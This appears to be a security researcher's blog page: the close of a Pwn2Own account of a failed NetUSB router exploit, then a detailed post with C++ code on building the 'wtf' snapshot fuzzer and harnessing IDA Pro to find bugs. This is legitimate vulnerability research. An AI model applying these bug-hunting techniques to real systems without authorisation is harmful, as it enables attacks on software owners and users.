As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would throw our exploits at the environment they had set up. At that point we had two exploits, and that's what we registered.

Right after receiving confirmation from ZDI, I noticed that TP-Link had pushed an update for the router 😳. I thought: Damn. I was at work when I saw the news and was stressed about the bug getting killed.
I was also worried that the update could have changed anything my exploit was relying on: the kernel, etc. I finished my day at work and pulled the firmware down from the website. I checked the release notes while the archive was downloading, but they didn't hint that either NetUSB or the kernel had been updated, which was... good. I extracted the filesystem from the firmware with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and... it was the same. Wow. What a relief 😮‍💨.

When the time came to demonstrate my exploit, it unfortunately didn't land in the three attempts, which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think I'd be able to compete, so I took this experience as a win on its own. On the bright side, my teammates were real pros and landed their exploits, which was awesome to see 🍾🏆.

# Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time, so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

• Attacking the kernel might be cool, but it is an absolute pain to debug and to set up an environment for. I probably would not go that route if I was doing it again.
• Vendors patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update, which was annoying. Fortunately, they were able to find another vulnerability, and this one stayed alive.
• Getting a root shell on the device ASAP is a good idea. I initially tried to find a post-auth vulnerability statically to get a root shell, but that was wasted time.
• Ghidra decompiles MIPS32 code pretty well. It wasn't perfect, but a net positive.
• I also realized later that the same driver was running on the NETGEAR router and was reachable from the WAN port.
I wasn't in it for the money, but maybe it would be good for me to do a better job of looking at more than one target instead of directly diving deep into a single one exclusively.
• The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
• Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB, here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title, and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽. Oh, and come hang out on Diary of a reverse-engineer's Discord server with us!

# Building a new snapshot fuzzer & fuzzing IDA

15 July 2021 at 15:00

# Introduction

It is January 2020 and it is that time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows target: user or kernel, application, service, or driver. He had done some work in this area, so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code in some kind of environment like a VM or an emulator.
It would allow the user to instrument the target the way they wanted via breakpoints and would provide the basic features you expect from a modern fuzzer: code coverage, crash detection, a general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool, but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

1. It is a complex Windows user-mode application,
2. It parses a bunch of binary files,
3. The application is heavy and slow to start. The snapshot approach could help fuzz it faster than a traditional approach would,
4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz (wtf), its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75. There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

# Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel crash dump and extracts the CPU state.
2. The user writes a module to tell wtf how to insert a test case into the target. wtf provides basic features like reading physical and virtual memory ranges, reading and writing registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
4.
wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available off the shelf. Getting physical memory is not enough, because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work, and so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run Intel 64-bit code and knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs' devices, so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboard, etc.

## Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

1. There is no need to load an entire memory dump into the emulator when it starts,
2. Only used memory gets mapped, making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
2.
GVA: Guest virtual address. This is guest virtual memory.
3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

```cpp
void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);
  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}
```

It is simple:

1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
2. we populate its content using the crash dump,
3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state.
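Stripped of the bochscpu specifics, the lazy page materialization described above can be modeled with plain containers. Here is a standalone sketch of the idea (my own simplified code, not wtf's: the names `Dump`, `Mapped`, and `MissingPage` are hypothetical):

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <map>

constexpr std::size_t PageSize = 0x1000;
using Page_t = std::array<std::uint8_t, PageSize>;

// Pages present in the crash dump, keyed by page-aligned GPA.
std::map<std::uint64_t, Page_t> Dump;

// Pages currently materialized for the emulator, keyed by page-aligned GPA.
std::map<std::uint64_t, Page_t> Mapped;

// Invoked when the guest touches a GPA with no backing page yet.
Page_t &MissingPage(const std::uint64_t Gpa) {
  const std::uint64_t AlignedGpa = Gpa & ~std::uint64_t(PageSize - 1);

  //
  // If the dump knows about this page, copy its content; otherwise assume
  // the guest OS is allocating "new" memory and hand out a zeroed page.
  //

  Page_t Page{};
  const auto It = Dump.find(AlignedGpa);
  if (It != Dump.end()) {
    Page = It->second;
  }

  return Mapped.emplace(AlignedGpa, Page).first->second;
}
```

In wtf, the `Mapped` insert corresponds to bochscpu_mem_page_insert, and the zero-filled branch is the "fake it 'till you make it" path shown above.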
This is a shortened version of LoadState:

```cpp
void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;

  //...

  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...

  bochscpu_cpu_set_state(Cpu_, &Bochs);
}
```

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

```cpp
//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;
```

I don't want to describe every hook, but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

```cpp
void BochscpuBackend_t::BeforeExecutionHook(
    /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}
```

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

```cpp
//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);
```

Great, we're now pros and we can run some code!

## Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

### Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory. Let's start with the easy one. To write into guest physical memory, we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space; that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs.
This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in that space. Same as above, writing across two pages needs extra care.

### Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy, as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

```cpp
void BochscpuBackend_t::BeforeExecutionHook(
    /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}
```

### Handling infinite loops

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

```cpp
void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}
```

### Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points.
Every time an instruction is executed, we add the address into a set:

```cpp
void BochscpuBackend_t::BeforeExecutionHook(
    /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }
```

### Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to:

```cpp
void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}
```

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

```cpp
bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...

  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...

  return true;
}
```

### Generic mutators

I think generic mutators are great, but I didn't want to spend too much time worrying about them. Ultimately, I think you get more value out of writing a domain-specific generator and building a diverse, high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's:

```cpp
class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};
```

### Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory. The main loop asks for a test case from the corpus, which gets mutated by one of the generic mutators and finally runs in one of the execution environments. If the test case generated new coverage, it gets added to the corpus store - nothing fancy.

```cpp
//
// If the coverage size has changed, it means that this testcase
// provided new coverage indeed.
//

const bool NewCoverage = Coverage_.size() > SizeBefore;
if (NewCoverage) {

  //
  // Allocate a test that will get moved into the corpus and maybe
  // saved on disk.
  //

  Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                      ReceivedTestcase.size());

  //
  // Before moving the buffer into the corpus, set up cross over with
  // it.
  //

  Mutator_->SetCrossOverWith(Testcase);

  //
  // Ready to move the buffer into the corpus now.
  //

  Corpus_.SaveTestcase(Result, std::move(Testcase));
}

// [...]

//
// If we get here, it means that we are ready to mutate.
// First thing we do is to grab a seed.
//

const Testcase_t *Testcase = Corpus_.PickTestcase();
if (!Testcase) {
  fmt::print("The corpus is empty, exiting\n");
  std::abort();
}

//
// If the testcase is too big, abort as this should not happen.
//

if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
  fmt::print(
      "The testcase buffer len is bigger than the testcase buffer max "
      "size.\n");
  std::abort();
}

//
// Copy the input in a buffer we're going to mutate.
//

memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
       Testcase->BufferSize_);

//
// Mutate in the scratch buffer.
//

const size_t TestcaseBufferSize =
    Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                     Opts_.TestcaseBufferMaxSize);

//
// Copy the testcase in its own buffer before sending it to the
// consumer.
//

TestcaseContent.resize(TestcaseBufferSize);
memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);
```

### Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest for our purpose. If you are fuzzing ida64.exe, you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

```cpp
void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}
```

### Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a test case to your target. To do that, you might need to read some global state to retrieve offsets of critical structures. We've built memory access facilities, so you can definitely do that, but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc. This was identified early on as a big pain point for the user, and I needed a way to not hardcode things that didn't need to be hardcoded.

To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

### Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use the whv / kvm APIs, you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating. Not knowing what's happening is also annoying when the guest is bug-checking inside the backend.
To address the lack of transparency, I decided to generate execution traces that I could use for debugging. It is very rudimentary, yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc. Those traces can also be loaded into lighthouse to analyze the coverage generated by a particular test case.

### Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work around the user exception handler, so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered by stack cookie check failures.

# Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins, and based on their sizes as well as past vulnerabilities, it felt like looking at ELF was my best chance. I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers, as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there, I realized that IDA had a few options to make my life easier:

• IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
• The -B option allows running IDA in batch mode from the command line,
• TVHEADLESS=1 also helped a lot regarding the GUI/Qt stuff I was working around.

Some of those options were documented later that year by Igor in this blog post: Igor's tip of the week #08: Batch mode under the hood.

## Inserting test cases

After finding those out, it immediately felt like harnessing was possible again.
The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc. To be able to deliver my test cases, I implemented a layer of hooks that allowed me to pass file i/o through from the guest to my host. This allowed me to read my IDA license keys, the configuration files, as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the other files that IDA generates that I didn't care about. This was quite a bit of work, and it was not really fun work either.

I was not a big fan of this pass-through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

```cpp
bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }
      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}
```

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

### Problem 1: Pre-load dlls

For IDA to know which loader is the right one to use, it loads all of them and asks them if they know what the file is. Remember that there is no disk when running in wtf, so loading a DLL is a problem. This problem was solved by injecting the DLLs into IDA with inject before generating the snapshot, so that no file i/o is generated when it loads them. The same problem happens with delay-loaded DLLs.

### Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o. I solved this problem for user-mode with lockmem, which is a small utility that locks all virtual memory ranges into the process' working set. As an example, this is the script I used to snapshot IDA, and it highlights how I used both inject and lockmem:

```bat
set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f
REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
